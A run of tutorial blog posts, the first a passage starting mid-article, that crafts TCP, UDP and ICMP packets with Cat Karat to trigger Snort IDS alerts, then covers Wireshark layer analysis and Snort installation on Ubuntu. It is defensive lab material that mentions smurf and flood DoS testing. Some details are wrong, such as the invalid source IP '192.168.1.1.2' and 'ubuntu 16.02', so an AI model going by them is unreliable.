So the Packet Assembly phase and Packet Editing phase for TCP–RST packet crafting is almost same as above only the difference is make in change TCP-Flag through which connection will be established with target network.

Since we want to send traffic through only reset packets for establishing connection with target network therefore enable the check box of Reset connect.

Click on play button given in menu bar for sending packet on target’s network which is part of Packet playing mode.

From given below image you can observe the result “Packet sent successfully”

Hence from given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as TCP protocol and TCP-RST packet.

TCP-PSH/ACK Packet Crafting

So the Packet Assembly phase and Packet Editing phase for TCP–PSH/ACK packet crafting is almost same as above only the difference is make in change TCP-Flag through which connection will be established with target network.

Since we want to send traffic through only Push with Acknowledgement packets for establishing connection with target network therefore enable the check box of PUSH Function and Acknowledgement.

Click on play button given in menu bar for sending packet on target’s network which is part of Packet playing mode.

From given below image you can observe the result “Packet sent successfully”

Hence from given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as TCP protocol and TCP-PSH/ACK packet.

UDP Packet Crafting

Similarly as above in Packet Assembly phase we need to decide protocol for crafting UDP packet, enable the radio button for selecting protocol and direction flow of packet. Here I had enable radio buttons for “IPv4” and “UDP” without disturbing remaining default packet flow as shown given below image.

Move into Protocol view section for Packet Editing and enter source and destination IP. I had added source and destination IP in packet under the third section protocol view -> Ipv4 as done above.

Now explore the UDP tab for design UDP packets as per your requirement, from given below image you can observe default setting details.

Source port: 00000

Destination port: 00000

Now the UDP traffic will flow from source port 0 to destination port 0.

Click on play button given in menu bar for sending packet on target’s network which is part of Packet playing mode.

From given below image you can observe the result “Packet sent successfully”

From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as UDP protocol and from source port 0 to destination 0 of 60 length.

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).    Contact Here

The post TCP & UDP Packet Crafting with CatKARAT appeared first on Hacking Articles.

In our previous article we had discussed “ICMP protocol with Wireshark” where we had seen how an ICMP protocol work at layer 3 according to OSI model and study its result using wireshark. Today we are going discuss to ICMP penetration testing by crafting ICMP packet to test our IDS “Snort” against all ICMP message Types using Cat Karat tool, you can download it from http://packetbuilder.net link.

For configuring Snort as IDS read our previous article “Configure snort in Ubuntu” it will automatically install snort in your system with predefine set of rules that will help in packet capturing of your network.

Let’s start!!

 Basically we will perform this practical in three phases as describe below:

Packet crafting: In this phase we will craft each ICMP packet with different type ICMP message using Cat Karat. For more detail about Packet crafting process read our previous article.

Packet Capturing: In this phase we will capture the ICMP packet and receive an alert when it will enters into target’s network using snort as IDS.

Packet Analysis: In this phase we will investigate captured packet using wireshark.

Brief Introduction on ICMP protocol

ICMP message contains two types of codes i.e. query and error.

Query: The query messages are the information we get from a router or another destination host.

For example given below message types are some ICMP query codes:

• Type 0 = Echo Reply
• Type 8 = Echo Request
• Type 9 = Router Advertisement
• Type 10 = Router Solicitation
• Type 13 = Timestamp Request
• Type 14 = Timestamp Reply

Error: The error statement messages reports problem which a router or a destination host may generate.

For example: given below message types are some of the ICMP error codes:

• Type 3 = Destination Unreachable
• Type 4 = Source Quench
• Type 5 = Redirect
• Type 11 = Time Exceeded
• Type 12 = Parameter Problems

Now when you will run the installed application “Cat KARAT” you will observe three important sections “Interfaces”, “Packet flow” and Packet view  which in their default state as shown in given below image.

Message TYPE 0 ICMP Packet Crafting

So as we know in Packet Crafting Operation “Packet Assembly” is 1st phase where we need to decide protocol for crafting any packet, which is quite easy to select with this tool. Only enable the radio button for selecting protocol and direction flow of packet. Here I had enable radio buttons for “IPv4” and “ICMP” without disturbing remaining default packet flow as shown given below image.

Next we need to select the “interface” which you can select from the Interfaces by double-Click on it.

Now next is “packet Editing” phase where you need to specify source IP address such as: 192.168.1.2 from which packet will be sent and Destination IP address such as: 192.168.1.107 on which packet is received. Moreover you can also make some changes in your packet such as Time to live (TTL), Data length and also can go with packet fragmentation.

From given below image you can observe I had added source and destination IP in packet under the third section protocol view -> Ipv4

Under 3^rd section protocol view in cat Karat explore ICMP tab and select “0-Echo Response” option which is generate type 0 ICMP message. Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network which known as “packet playing” phase of packet Crafting operation. This ICMP message type also uses to test the strength of IDS and Firewall against ICMP smurf Dos Attack.

Capturing ICMP-Type0 packet through IDS

Advantage of install snort through apt respiratory is that, it is quick and easy to install in your system as well as it contains predefine set of rule files related to every type of network traffic either TCP/UDP or ICMP.

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP echo Reply packet is found in network. This rule also works against Smurf Dos attack in which ICMP echo reply/response traffic is received on target’s network without sending genuine ICMP request packet from target’s network to other network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Echo Reply” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type0 packet through Wireshark

Now Last phase is Packet Analysis which is also last mode of operation of packet crafting process where received packet is analysis using packet analysis tool. Here we had use wireshark for capturing incoming traffic. From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type packet and other information.

When the tester will click on Stop button given in menu bar of Cat Karat tool he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 0 is successfully sent on target machine.

Message TYPE 1 ICMP Packet Crafting

So the Packet Assembly phase and Packet Editing phase for ICMP packet crafting is almost same as above only the difference is make in change ICMP message through which connection will be established with target network.

Since we want to send traffic through message type 1 packets for establishing connection with target network therefore select Type -1 Reserved from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network which known as “packet playing” phase of packet Crafting operation.

Capturing ICMP-Type1 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP unassigned type 1 packet is found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP unassigned type 1” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type1 packet through Wireshark

From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type “Reserved”  packets and other information.

When the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 1 is successfully sent on target machine.

Message TYPE 2 ICMP Packet Crafting

Again the Packet Assembly phase and Packet Editing phase for ICMP packet crafting is almost same as above only the difference is make in change ICMP message through which connection will be established with target network.

Since we want to send traffic through only message type 2 packets for establishing connection with target network therefore select Type 2 Reserved from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button for sending packet on target’s network.

Capturing ICMP-Type2 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP unassigned type 2 packet is found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when again our IDS received any matching packets defined in its file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP unassigned type 2” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type2 packet through Wireshark

Here also the wireshark has captured exactly same information as per our prediction and fetch same details which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message “Reserved” packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 2 is successfully sent on target machine.

Message TYPE 3 ICMP Packet Crafting

Now we want to send traffic through message type 3 packets for establishing connection with target network therefore select Type 3 Destination Unreachable from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type3 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP Destination Unreachable  Network Unreachable packet when found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

As said above so when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Destination Unreachable Network Unreachable” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type3 packet through Wireshark

From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type “Destination Unreachable” (Network Unreachable) packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 3 is successfully sent on target machine.

Message TYPE 4 ICMP Packet Crafting

So the Packet Assembly phase and Packet Editing phase for ICMP packet crafting is almost same as above only the difference is make in change ICMP message through which connection will be established with target network.

Since we want to send traffic through message type 4 packets for establishing connection with target network therefore select Type 4 Source Quench from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network which known as “packet playing” phase of packet Crafting operation.

Capturing ICMP-Type4 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP Source Quench packet when found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Source Quench” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type4 packet through Wireshark

Here also the wireshark has captured exactly same information as per our prediction and fetch same details which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type “Source quench” packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 4 is successfully sent on target machine.

Message TYPE 5 ICMP Packet Crafting

We want to send traffic through message type 5 packets for establishing connection with target network therefore select Type 5 Redirect from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type5 packet through IDS

As given in below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP redirect net packet when found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Redirect net” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type5 packet through Wireshark

Again as per our prediction wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type “redirect” packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 5 is successfully sent on target machine.

Message TYPE 6 ICMP Packet Crafting

So the Packet Assembly phase and Packet Editing phase for ICMP packet crafting is almost same as above only the difference is make in change ICMP message through which connection will be established with target network.

Here now next we want to send traffic through message type 6 packets for establishing connection with target network therefore select Type 6 for Alternate Host Address from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type6 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP Alternate Host Address packet is found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Alternate Host Address” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type6 packet through Wireshark

From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type “Alternate Host Address” packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 6 is successfully sent on target machine.

Message TYPE 7 ICMP Packet Crafting

Again Repeat the same and send traffic through message type 7 packets for establishing connection with target network therefore select Type 7 for Unassigned from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type7 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP Alternate Host Address packet is found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Therefore when IDS received any matching packets described in file of rules then it will generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP unassigned type 7” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type7 packet through Wireshark

Wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP unknown message type “obsolete or malformed” packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 7 is successfully sent on target machine.

Message TYPE 8 ICMP Packet Crafting

Since we want to send traffic through message type 8 packets for establishing connection with target network therefore select Type 8 for ICMP echo Request from given list.

This step is very useful because it will craft a packet will send ICMP Request packet on target’s network to test the strength of IDS and Firewall.

Infinite packet ICMP Request packet is consider as ICMP Flood or Ping of Death Attack when sent only network therefore we can check our IDS and Firewall Strength against such DOS attack through this packet crafting.   

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type8 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP Ping packet is found in network. As we know ICMP echo Request packet is consider as Ping request packet which sends request to a network IP for establishing connection with it.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generates an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Ping ” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type8 packet through Wireshark

From given below image you can observe that wireshark has captured Ping packet for ICMP Echo request as described above, exactly same information which we had bind in packet such as ICMP protocol, ICMP Ping request message packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 8 is successfully sent on target machine.

Message TYPE 9 ICMP Packet Crafting

Now at last we want to send traffic through message type 9 packets for establishing connection with target network therefore select Type 9 for router Advertisement from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type9 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP router Advertisement packet is found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP router Advertisement” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type9 packet through Wireshark

From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP P ICMP router Advertisement message packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 9 is successfully sent on target machine.

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).    Contact Here

The post ICMP Penetration Testing appeared first on Hacking Articles.

Today we are going to discuss “Network Packet Forensic”  by covering some important track such as how Data is transferring between two nodes, what is “OSI 7 layer model” and Wireshark stores which layers information when capture the traffic between two networks.

As we know for transferring the data from one system to other we need a network connection which can be wired or wireless connection. But in actually transmission of data is not only depends upon network connection apart from that it involves several phases for transmitting data from one system to another which was explained by OSI model.

 OSI stands for Open Systems Interconnection model which is a conceptual model that defines and standardizes the process of communication between sender’s and receiver’s system. The data is transfer through 7 layers architecture where each layer has a specific function in transmitting data over next layer.  

Now have a look over given below image where we had explained the functionality of each layer in OSI model. So when data is transmitted by sender’s network then it will go in downward direction and data move from application layer to physical layer whereas when receiver will receive the transmitted data it will come in upward direction from physical layer to application layer.

Flow of Data from Sender’s network: Application > Presentation > Session > Transport > Network > Data Link > Physical

Flow of Data from Receiver’s network: Physical > Data Link > Network > Transport > Session > Presentation > Application

Examine Layers captured by Wireshark

Basically when a user opens any application for sending or receiving Data then he directly interacts with application layer for both operations either sending or receiving of data. For example we act as client when use Http protocol for uploading or Downloading a Game; FTP for downloading a File; SSH for accessing the shell of remote system.

While connecting with any application for sharing data between server and client we make use of Wireshark for capturing the flow of network traffic stream to examine the OSI model theory through captured traffic.

From given below image you can observe that wireshark has captured the traffic of four layers in direction of source (sender) to destination (receiver) network.

Here it has successfully captured Layer 2 > Layer 3 > Layer 4 and then Layer 7 information.

Ethernet Header (Data Link)

 Data link layer holds 6 bytes of Mac address of sender’s system and receiver’s system with 2 bytes of Ether type is used to indicate which protocol is encapsulated i.e. IPv4/IPv6 or ARP .

In wireahark Ethernet II layer represent the information transmitted over data link layer. From given below image you can observed that highlighted lower part of wireshark is showing information in Hexadecimal format where the first row holds information of Ethernet headers details.

So here you can get source and destination Mac address which also available in Ethernet Header.

The row is divided into three columns as described below: 

As we know Mac address of system is always represents in Hexadecimal format but Ether type are generally categories in given below ways.

Once again if you notice given below image then you can observe the highlighted text in Pink color is showing hex value 08 00 which indicates that here IPv4 is used.

IP Header (Network Layer)

IP header in wireshark described the network layer information which is also known as backbone of OSI model as it holds Internet Protocol version 4 complete details. Network layer divides data frame into packets and define its routing path through some hardware devices such as routers, bridges, and switches. These packets are identified through their logical address i.e. source or destination network IP address.

In Image of wireshark I have highlighted six most important values which contain vital information of a data packet and this information always flow in same way as they are encapsulated in same pattern for each IP header.

Now here 45 represent IPv4 header length while 40 is time to live (TTL) of packet and 06 is hex value for TCP protocol which means these values get change any things change i.e. TTL, Ipv4 and Protocol.

Therefore you can take help of given below table for examine TTL value for different operating system. 

Similarly you can take help of given below table for examine other Protocol value.

From given below image you can observe Hexadecimal information of IP header field and using given table you can study these value to obtain their original value.

TCP Header (Transport layer)

Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) and Internet Control Message protocol (ICMP) are the major protocols as it gives host-to-host connectivity at the Transport Layer of the OSI model. It is also known as Heart of OSI model as it play major role in transmitting errors free data.

By examine Network Layer information through wireshark we found that here TCP is used for establishing connection with destination network.

We knew that a computer communicates with another device like a modem, printer, or network server; it needs to handshake with it to establish a connection.

TCP follow Three-Way-Handshakes as describe below:

• Client sends a TCP packet to the server with the SYN flag
• Server responds to the client request with the SYN and ACK flags set.
• Client completes the connection by sending a packet with the ACK flag set

Structure of TCP segment

Transmission Control Protocol accepts data from a data stream, splits it into chunks, and adds a TCP header creating a TCP segment. A TCP segment only carries the sequence number of the first byte in the segment.

A TCP segment consists of a segment header and a data section. The TCP header contains mandatory fields, and an optional extension field.

Different Types of TCP flags

TCP flags are used within TCP header as these are control bits that specify particular connection states or information about how a packet should be set. TCP flag field in a TCP segment will help us to understand the function and purpose of any packet in the connection. 

From given below image you can observe Hexadecimal information of TCP header field and using given table you can study these value to obtain their original value.

Sequence and acknowledgement numbers are is major part of TCP, and they act as a way to guarantee that all data is transmitted consistently since all data transferred through a TCP connection must be acknowledged by the receiver in a suitable way. When an acknowledgement is not received, then the sender will again send all data that is unacknowledged.

Using given below table you can read Hex value of other Port Number and their Protocol services. Although these services operate after getting acknowledgement from destination network and explore at application layer OSI model.

In this way you can examine every layer of Wireshark for Network Packet Forensic.

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).    Contact Here

The post Network Packet Forensic using Wireshark appeared first on Hacking Articles.

In our previous article we had discussed “Manually Snort Installation” in your system but there is another method also available by apt-repository which reduce your manually effort and automatically configure snort in your system.

Snort is software created by Martin Roesch, which is widely use as Intrusion Prevention System [IPS] and Intrusion Detection System [IDS] in network. It is separated into the five most important mechanisms for instance: Detection engine, Logging and alerting system, Packet decoder, Preprocessor and Output modules.

The program is quite famous to carry out real-time traffic analysis, also used to detect query or attacks, packet logging on Internet Protocol networks, to detect malicious activity, denial of service attacks and port scans by monitoring network traffic, buffer overflows, server message block probes, and stealth port scans.

Snort can be configured in three main modes:

• Sniffer mode: it will observe network packets and present them on the console.
• Packet logger mode: it will record packets to the disk.
• Intrusion detection mode: the program will monitor network traffic and analyze it against a rule set defined by the user.

After that the application will execute a precise action depend upon what has been identified.

Let’s Begin!!

Snort Installation

We had chosen ubuntu 16.02 operating system for installation and configuration of snort. Earlier than installing snort in your machine, you should need to install necessary dependencies of ubuntu.

Check your network interface configuration by executing ifconfig command; from here I came to know 192.168.1.107 is my network IP.

Earlier than installing snort in your machine, you should need to install necessary dependencies of ubuntu. Therefore open the terminal and type given below command to install pre-requisites by a making update.

sudo apt-get update

It is an easiest way to install and configure the snort is your system because all its requirement whether it is snort rules directory or logging directory every packages is are stored by apt repository. Enter given below command to begin the snort installations. 

sudo apt-get install snort*

By defaut eth0 is listening interface is set in snort configuration since my network belongs to ens33,  therefore I choose it as listening interface as shown in given below image.

In next configuration step it will ask to enter CIDR value for address range for local network. From given image you can observe I had mention CIDR 192.168.1.1/24 for a range of 256 address.

You can also multiple values by using comma without space to separate those address

After then open the configuration file using gedit for making some changes inside.

sudo gedit /etc/snort/snort.conf

Scroll down the text file near line number 45 to specify your network for protection as shown in given image.

#Setup the network addresses you are protecting

 ipvar HOME_NET 192.168.1.1/24

Now run given below command to enable IDS mode of snort

sudo snort -A console -i ens33 -c /etc/snort/snort.conf

Now it will compile the complete file and test the configuration setting automatically as shown in given below image:

Great!! We had successfully configured snort as IDS for protecting our network.

[Note: If apt- repository get failed to install snort then go with manual configuration from here.]

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Configure Snort in Ubuntu (Easy Way) appeared first on Hacking Articles.